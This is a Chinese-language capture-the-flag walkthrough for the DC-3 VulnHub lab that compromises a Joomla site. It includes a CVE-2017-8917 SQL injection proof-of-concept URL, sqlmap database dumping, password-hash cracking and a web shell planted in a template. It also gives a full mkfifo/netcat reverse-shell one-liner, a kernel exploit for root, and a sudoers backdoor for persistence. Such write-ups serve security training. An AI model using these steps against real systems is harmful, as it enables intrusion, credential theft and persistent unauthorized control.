环境：VMware下：kali Linux（10.9.28.45）、DC-3（10.9.28.196）、win7SP1（10.9.28.131）

范围确定

根据mac地址确定目标


信息收集

根据http://vulnhun.org的作者描述，此靶机只有1个flag


Nmap扫描端口信息，只开放了80端口


访问目标网页


根据wappalyzer的信息主机使用的CMS是joomla，系统是Ubuntu，后端语言是PHP


使用dirsearch扫描目录


6


漏洞挖掘

使用xray

开启浏览器代理


开启xray


进入网站随便用账密登录，xray扫描到sql注入漏洞，编号为cve-2017-8917


根据显示的POC：

http://10.9.28.196/index.php?option=com_fields&view=fields&layout=modal&list[f
ullordering]=updatexml(0x23,concat(1,md5(8888)),1)

进行验证


漏洞利用

使用sqlmap，先爆数据库，-u指定url，-p指定参数。--dbs显示数据库名 ，期间一路回车


Sqlmap还得出时间盲注


获取当前数据库名，--current-db显示当前数据库



获取joomladb下的表，-D 指定数据库，--tables显示表名


存在75张表


先查看 #__users 表，-T指定表，--columns显示列名


此处需要枚举列名



查看数据，-C指定列，--dump显示数据


只有1行admin推测是管理员


把密码拿到存入文件进行本地


使用hashcat尝试破解


得出密码是 snoopy


使用这个密码登录网站


登录之后啥也干不了

根据信息搜集阶段的目录扫描结果，尝试进入administrator


选择上方菜单栏，选择templates可以直接编辑网站代码


任意选一个，我这里选error.php，添加一句话木马


进入目标位置验证


使用蚁剑连接，成功getshell


反向shell

在kali上使用nc监听端口


在蚁剑的虚拟终端中查看有没有nc 和-e选项


没有，就使用

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f


在kali中成功连接


权限提升

查看系统版本


使用searchsploit搜索相关漏洞，使用double-fdput


查看漏洞库文件


根据使用提示，运行两个文件后直接获取root


在最后一行得到EXP的下载地址


在一般在回收站，日志，缓存目录下有写权限，把EXP传到目标的/tmp目录下


解压文件




运行编译文件


再运行doubleput，就直接获取root


拿到flag


维持权限

添加用户，设置密码，然后写入到/etc/sudoers